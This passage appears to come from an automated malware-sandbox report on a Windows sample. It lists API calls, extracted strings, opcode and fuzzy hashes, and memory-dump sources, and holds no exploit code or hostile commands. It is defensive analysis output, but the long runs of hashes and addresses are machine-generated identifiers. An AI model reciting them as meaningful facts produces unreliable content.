                                                                                        • Instruction Fuzzy Hash: 99A011B02022008B83028F30AE08A0A3AACAA00380B08002BA00AC0030EAA088A0AB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                        • Instruction ID: b3995e20b677407f7601c1f8f831700854c91e2e52fe41cec7e34f26fa9fb912
                                                                                        • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                        • Instruction Fuzzy Hash: 9C62F771604B859FCB26CF28C4A16B9BBE1AF95304F09C96DD8DE8B742D738E944CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Instruction ID: 0ae6c66e3ba1449e58d4d1605877ed70236333c659a3555adbb7b9efe06b48ab
                                                                                        • Opcode Fuzzy Hash: bdbed9b5303bb61bc775235c42beefd1d6a1ff618febf51a01ffa4ca50a681cf
                                                                                        • Instruction Fuzzy Hash: 4E51E0B1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734E959CB96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                        • Instruction ID: c40d61874474d8868eeee055ce3860808490de3be8a899477b5b23bf40404cb0
                                                                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                        • Instruction Fuzzy Hash: E131D5B2A147568FCB25DF28C85116ABBE0FB95304F10852DE499D7741C739EA0ACB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 0036E30E
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                          • Part of subcall function 00371DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,003A1030,?,0036D928,00000000,?,00000050,003A1030), ref: 00371DC4
                                                                                        • _strlen.LIBCMT ref: 0036E32F
                                                                                        • SetDlgItemTextW.USER32(?,0039E274,?), ref: 0036E38F
                                                                                        • GetWindowRect.USER32(?,?), ref: 0036E3C9
                                                                                        • GetClientRect.USER32(?,?), ref: 0036E3D5
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0036E475
                                                                                        • GetWindowRect.USER32(?,?), ref: 0036E4A2
                                                                                        • SetWindowTextW.USER32(?,?), ref: 0036E4DB
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0036E4E3
                                                                                        • GetWindow.USER32(?,00000005), ref: 0036E4EE
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0036E51B
                                                                                        • GetWindow.USER32(00000000,00000002), ref: 0036E58D
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                        • String ID: $%s:$CAPTION$d$t9
                                                                                        • API String ID: 2407758923-2433586919

                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 0038CB66
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C71E
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C730
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C742
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C754
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C766
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C778
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C78A
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C79C
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7AE
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7C0
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7D2
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7E4
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7F6
                                                                                        • _free.LIBCMT ref: 0038CB5B
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 0038CB7D
                                                                                        • _free.LIBCMT ref: 0038CB92
                                                                                        • _free.LIBCMT ref: 0038CB9D
                                                                                        • _free.LIBCMT ref: 0038CBBF
                                                                                        • _free.LIBCMT ref: 0038CBD2
                                                                                        • _free.LIBCMT ref: 0038CBE0
                                                                                        • _free.LIBCMT ref: 0038CBEB
                                                                                        • _free.LIBCMT ref: 0038CC23
                                                                                        • _free.LIBCMT ref: 0038CC2A
                                                                                        • _free.LIBCMT ref: 0038CC47
                                                                                        • _free.LIBCMT ref: 0038CC5F
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID: h9
                                                                                        • API String ID: 161543041-554728239

                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00389705
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 00389711
                                                                                        • _free.LIBCMT ref: 0038971C
                                                                                        • _free.LIBCMT ref: 00389727
                                                                                        • _free.LIBCMT ref: 00389732
                                                                                        • _free.LIBCMT ref: 0038973D
                                                                                        • _free.LIBCMT ref: 00389748
                                                                                        • _free.LIBCMT ref: 00389753
                                                                                        • _free.LIBCMT ref: 0038975E
                                                                                        • _free.LIBCMT ref: 0038976C
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID: 0d9
                                                                                        • API String ID: 776569668-2243828265

                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00379736
                                                                                        • _wcslen.LIBCMT ref: 003797D6
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 003797E5
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00379806
                                                                                        Similarity
                                                                                        • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                        • String ID: Fjun7$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                        • API String ID: 1116704506-1321622670

                                                                                        APIs
                                                                                        • GetWindow.USER32(?,00000005), ref: 0037D6C1
                                                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 0037D6ED
                                                                                          • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0037D709
                                                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0037D720
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0037D734
                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0037D75D
                                                                                        • DeleteObject.GDI32(00000000), ref: 0037D764
                                                                                        • GetWindow.USER32(00000000,00000002), ref: 0037D76D
                                                                                        Similarity
                                                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                        • String ID: STATIC
                                                                                        • API String ID: 3820355801-1882779555

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 322700389-393685449
                                                                                        • Opcode ID: 7d12f571a49bad8ee25b87953de65253c33eab3c4e4dd38d2b6e183ab11da264
                                                                                        • Instruction ID: 0145e014c49bcc446669f86444e7c1c239d8a1eb58b13eced782fff9d9279981
                                                                                        • Opcode Fuzzy Hash: 7d12f571a49bad8ee25b87953de65253c33eab3c4e4dd38d2b6e183ab11da264
                                                                                        • Instruction Fuzzy Hash: D6B15575800309EFCF2AFFA4C8859AFBBB5BF14B10B15419AE8056B312D735DA51CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00366FAA
                                                                                        • _wcslen.LIBCMT ref: 00367013
                                                                                        • _wcslen.LIBCMT ref: 00367084
                                                                                          • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                          • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                          • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 3122303884-3508440684
                                                                                        • Opcode ID: f9050661405863ae0e65fe2959d75fe8e208106eda22f764304e49be063362da
                                                                                        • Instruction ID: 6b6bda3a5ad7a7ec329c240031c42dba128a26fa8d24cfeb2e1696c6da344ad9
                                                                                        • Opcode Fuzzy Hash: f9050661405863ae0e65fe2959d75fe8e208106eda22f764304e49be063362da
                                                                                        • Instruction Fuzzy Hash: C1413BB1D087447AEF33E7709C42FEEB36C9F05348F408455FA55AA286D674AA448B31
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037B610
                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0037B637
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0037B650
                                                                                        • SetWindowTextW.USER32(?,?), ref: 0037B661
                                                                                        • GetDlgItem.USER32(?,00000065), ref: 0037B66A
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0037B67E
                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0037B694
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                        • String ID: LICENSEDLG
                                                                                        • API String ID: 3214253823-2177901306
                                                                                        • Opcode ID: d6a87b002b5c491d968797bb1b3ad19f69425f2dcd1f0bd2d072ce2bd2306a9d
                                                                                        • Instruction ID: 808de1ce296c5d0a778fa1705c40915954bf6d828be70c9ecc176d2c6369fe30
                                                                                        • Opcode Fuzzy Hash: d6a87b002b5c491d968797bb1b3ad19f69425f2dcd1f0bd2d072ce2bd2306a9d
                                                                                        • Instruction Fuzzy Hash: 3021D632204218BFD6236B65EC49F7B7B7CEB4AB85F02C014F709E65A0CB56A9019735
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,D7A0014E,00000001,00000000,00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FD99
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE14
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0037FE1F
                                                                                        • _com_issue_error.COMSUPP ref: 0037FE48
                                                                                        • _com_issue_error.COMSUPP ref: 0037FE52
                                                                                        • GetLastError.KERNEL32(80070057,D7A0014E,00000001,00000000,00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE57
                                                                                        • _com_issue_error.COMSUPP ref: 0037FE6A
                                                                                        • GetLastError.KERNEL32(00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE80
                                                                                        • _com_issue_error.COMSUPP ref: 0037FE93
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 1353541977-0
                                                                                        • Opcode ID: e229f5b64b68412a70370b4ded5ba5f082dae5b78ed6c20c1d820baeb9c12f84
                                                                                        • Instruction ID: 5a4201071040786365f47383206bfa696e5d0a46e1926bd269423af698b77b93
                                                                                        • Opcode Fuzzy Hash: e229f5b64b68412a70370b4ded5ba5f082dae5b78ed6c20c1d820baeb9c12f84
                                                                                        • Instruction Fuzzy Hash: 6641CCB1A00215EFDB229F64CC45BAFB7A8FF44710F10827AF919E7651D7399900C7A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                        • API String ID: 3519838083-3505469590
                                                                                        • Opcode ID: 74572c897101a63615dfe1f930d42f306f037ea6874297c1ab322b0463bca02b
                                                                                        • Instruction ID: b801edb2f40fc564b1e0a9c92ee9ad070567d51cea78767f89f65ef547e86f72
                                                                                        • Opcode Fuzzy Hash: 74572c897101a63615dfe1f930d42f306f037ea6874297c1ab322b0463bca02b
                                                                                        • Instruction Fuzzy Hash: 50715B71A00619AFDF16DFA8CC959AFBBB9FF48310B044559E512E72A0CB31AD41CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00369387
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003693AA
                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 003693C9
                                                                                          • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                          • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                        • _swprintf.LIBCMT ref: 00369465
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 003694D4
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00369514
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                        • String ID: rtmp%d
                                                                                        • API String ID: 3726343395-3303766350
                                                                                        • Opcode ID: bb83b551878aaaa2d0cb4493f7b829b4be0fac24e1fa8e83c794b72e1b88bffc
                                                                                        • Instruction ID: 00108c9c8ec5415db0e32dbbd43f73687448d6260f0222137f414dc3a19af6da
                                                                                        • Opcode Fuzzy Hash: bb83b551878aaaa2d0cb4493f7b829b4be0fac24e1fa8e83c794b72e1b88bffc
                                                                                        • Instruction Fuzzy Hash: 504177B1900258A5DF23EB61CD55FEE737CAF45740F00C8A6B64AE7155DB388B898B60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: U7$p7$z7
                                                                                        • API String ID: 176396367-3179075045
                                                                                        • Opcode ID: 24fc483c363a08b2ff61462a3e27a690a25493edb9e03439e5c448b75650deea
                                                                                        • Instruction ID: 23e00f1cb78c102a2918df415b6aaa91b44ddf80a76c7ed3cba2d1b8ced83ebe
                                                                                        • Opcode Fuzzy Hash: 24fc483c363a08b2ff61462a3e27a690a25493edb9e03439e5c448b75650deea
                                                                                        • Instruction Fuzzy Hash: 4841B6719006699BCB26AF68CC159DFBBBCEF01311F058019F946F7245DB34AE458BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00379EEE
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00379F44
                                                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 00379FDB
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00379FE3
                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00379FF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$Show$RectText
                                                                                        • String ID: 7$RarHtmlClassName
                                                                                        • API String ID: 3937224194-370341044
                                                                                        • Opcode ID: f6950df47ae3a90ac9b8bec741642b4d37c59e7ce0761aebafeb6afb7abb8fb8
                                                                                        • Instruction ID: f69b7a7f50432805bf5da223437626acb393e0495c5109055a2302a1ca8d6d8d
                                                                                        • Opcode Fuzzy Hash: f6950df47ae3a90ac9b8bec741642b4d37c59e7ce0761aebafeb6afb7abb8fb8
                                                                                        • Instruction Fuzzy Hash: B841AF32008314EFCB23AF649C48F6B7BACEF48702F05C659F8499A156DB38E904DB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __aulldiv.LIBCMT ref: 0037122E
                                                                                          • Part of subcall function 0036B146: GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00371251
                                                                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00371263
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00371274
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371284
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371294
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003712CF
                                                                                        • __aullrem.LIBCMT ref: 00371379
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                        • String ID:
                                                                                        • API String ID: 1247370737-0
                                                                                        • Opcode ID: 43e78a912b511cc4ebf3097787fb09253fb26a9a28d6c74b0e54ccffe16df1d6
                                                                                        • Instruction ID: a324559b808e068a019df5012837949852d5623d57ca928de80683eda7dd0bc3
                                                                                        • Opcode Fuzzy Hash: 43e78a912b511cc4ebf3097787fb09253fb26a9a28d6c74b0e54ccffe16df1d6
                                                                                        • Instruction Fuzzy Hash: 9B4118B6508305AFD711DF69C88496BBBF9FF88314F00892EF59AC6210E739E649CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 00362536
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                          • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                        • API String ID: 3053425827-2277559157
                                                                                        • Opcode ID: 8b390e0dadf2525ceb3b1d6cde3a00ce2ee7cadccf792d96981109fa595e9f24
                                                                                        • Instruction ID: 49d3e63ba858cedbed4ae221c08d13dc5ac126d87125323100fd59693346f4ba
                                                                                        • Opcode Fuzzy Hash: 8b390e0dadf2525ceb3b1d6cde3a00ce2ee7cadccf792d96981109fa595e9f24
                                                                                        • Instruction Fuzzy Hash: 19F125716047409BCB27DB288895BFB77995F90300F0AC569EDCA9F28BCB648945C762
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: </p>$</style>$<br>$<style>$>
                                                                                        • API String ID: 176396367-3568243669
                                                                                        • Opcode ID: db6ae0074ed855282495a25ef839ffde6b161c55a8c505cb1725ed8a6d5c8498
                                                                                        • Instruction ID: c595c3be7dcbdbba2f40eb3034dc4688a01a0e59c1dec2329269979808171d4a
                                                                                        • Opcode Fuzzy Hash: db6ae0074ed855282495a25ef839ffde6b161c55a8c505cb1725ed8a6d5c8498
                                                                                        • Instruction Fuzzy Hash: 25515C6670032395DB329A199C21B7673E0DFA1750F6AC61BF9C99B6C0FB6D8C418361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0038FE02,00000000,00000000,00000000,00000000,00000000,0038529F), ref: 0038F6CF
                                                                                        • __fassign.LIBCMT ref: 0038F74A
                                                                                        • __fassign.LIBCMT ref: 0038F765
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0038F78B
                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,0038FE02,00000000,?,?,?,?,?,?,?,?,?,0038FE02,00000000), ref: 0038F7AA
                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,0038FE02,00000000,?,?,?,?,?,?,?,?,?,0038FE02,00000000), ref: 0038F7E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1324828854-0
                                                                                        • Opcode ID: 5db9e85fb4d69124dae72e1bc3b12bdc1a3db6fdd6ae6e50df92fe47003b7907
                                                                                        • Instruction ID: 4f51bcbf06bc860e9053dd3af21733da2b465ac36f9b01733c2b62d604c80713
                                                                                        • Opcode Fuzzy Hash: 5db9e85fb4d69124dae72e1bc3b12bdc1a3db6fdd6ae6e50df92fe47003b7907
                                                                                        • Instruction Fuzzy Hash: 2851A3B19003099FDB11DFA8DC85AEEBBF8EF09300F1541AAE555E7251E670AA40CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 0037CE9D
                                                                                          • Part of subcall function 0036B690: _wcslen.LIBCMT ref: 0036B696
                                                                                        • _swprintf.LIBCMT ref: 0037CED1
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • SetDlgItemTextW.USER32(?,00000066,003A946A), ref: 0037CEF1
                                                                                        • _wcschr.LIBVCRUNTIME ref: 0037CF22
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037CFFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
